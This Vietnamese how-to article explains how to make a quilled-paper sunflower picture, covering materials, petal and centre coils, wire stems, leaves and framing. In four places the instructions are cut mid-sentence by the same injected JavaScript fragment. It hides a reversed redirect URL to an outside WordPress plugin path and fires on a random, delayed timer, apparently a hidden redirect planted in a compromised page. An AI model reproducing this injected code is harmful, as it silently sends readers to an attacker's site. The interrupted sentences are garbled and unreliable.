Cách làm tranh giấy xoắn hoa hướng dương

Bức tranh sẽ mang tới không khí tươi mới và ấm áp cho căn phòng thân yêu của bạn.
Tranh giấy xoắn hoa hướng dương rực rỡ 1
Bạn cần chuẩn bị những nguyên vật liệu như sau:
– Sợi giấy màu vàng dùng xoắn giấy cho các cánh hoa, sợi giấy màu nâu dùng làm nhụy hoa: bạn có thể mua sẵn hoặc tự dọc những sợi nhỏ trên giấy bìa vàng
– Keo sữa, thước có khuôn hình tròn, dụng cụ dùi xoắn giấy (nếu có)
– Giấy bìa xanh làm lá, kẽm canh hoặc kẽm nhỏ và sáp xanh (băng dính giấy xanh) để quấn cành
– Bút dạ màu đen hoặc xanh đậm vẽ gân lá
– Khung tranh có nền giấy hoặc vải căng sẵn
Tranh giấy xoắn hoa hướng dương rực rỡ 2
Bước 1:
Cuộn sợi giấy vàng thành nhiều lớp vòng tròn khít nhau, tùy theo bạn muốn làm cánh hoa toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to hay nhỏ mà cuộn nhiều hay ít vòng. Thả phần giấy cuộn vào khuôn tròn của thước, bạn cần làm nhiều cuộn cùng khuôn để các cánh hoa đều nhau. Để cuộn giấy giãn tự nhiên tới hết cỡ trong khuôn thì dán cố định điểm đầu cuối giấy lại. Bóp nhọn hai đầu cuộn giấy, ghim chặt một đầu cho các vòng xoắn giấy xô về một bên, đầu còn lại được bạn bóp uốn cong nhẹ tạo dáng cánh hoa. Bạn cần làm 10 – 15 cánh như vậy cho một bông hoa hướng dương.
Tranh giấy xoắn hoa hướng dương rực rỡ 3
Bước 2:
Dùng sợi giấy màu nâu cuộn thành cuộn nhỏ thật chặt, dán điểm đầu cuối giấy, khi keo khô bạn đẩy nhẹ lõi cuộn giấy tụt ra khỏi mặt phẳng ban đầu một chút tạo thành một nút xoáy nhỏ, bôi keo vào trong nút cho nó ổn định hình dạng. Nhiều nút như vậy dán trên một miếng giấy nâu hình tròn sẽ tạo thành nhụy hoa hướng dương.
Tranh giấy xoắn hoa hướng dương rực rỡ 4
Bước 3:
Cuốn sáp xanh (băng dính giấy xanh dùng trong làm hoa giả) cuốn quanh sợi kẽm nhỏ để làm cành hoa, dán các đầu cành vào một miếng bìa xanh hình tròn vờ như gắn đài hoa.
Tranh giấy xoắn hoa hướng dương rực rỡ 5
Bước 4:
Dán các cánh hoa xòe đều trên đài hoa, dán gắn nhụy hoa vào chính giữa.
Tranh giấy xoắn hoa hướng dương rực rỡ 6
Bước 5:
Vẽ hình lá hoa hướng dương có kích thước toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to gần bằng bông hoa. Dùng bút dạ vẽ gân lá. Cắt nhiều lá trên bìa xanh, lá toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to nhỏ khác nhau cho tự nhiên.
Hoa hướng dương vốn có vẻ đẹp tự nhiên và thường được thể hiện như đang tươi tắn đón nắng giữa cánh đồng. Vì thế bạn gắn hoa tự nhiên trên một khung tranh, hoa lá toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);} to phía dưới, hoa lá nhỏ phía trên và cùng hướng về một phía càng đẹp.
Tranh giấy xoắn hoa hướng dương rực rỡ 7
Bạn có thể gắn hạt cà phê nâu (đã rang khô) xung quanh bức tranh làm một bo tranh tự nhiên và tạo hương thơm ngát. Chúc bạn thành công nhé!
Theo afamily.vn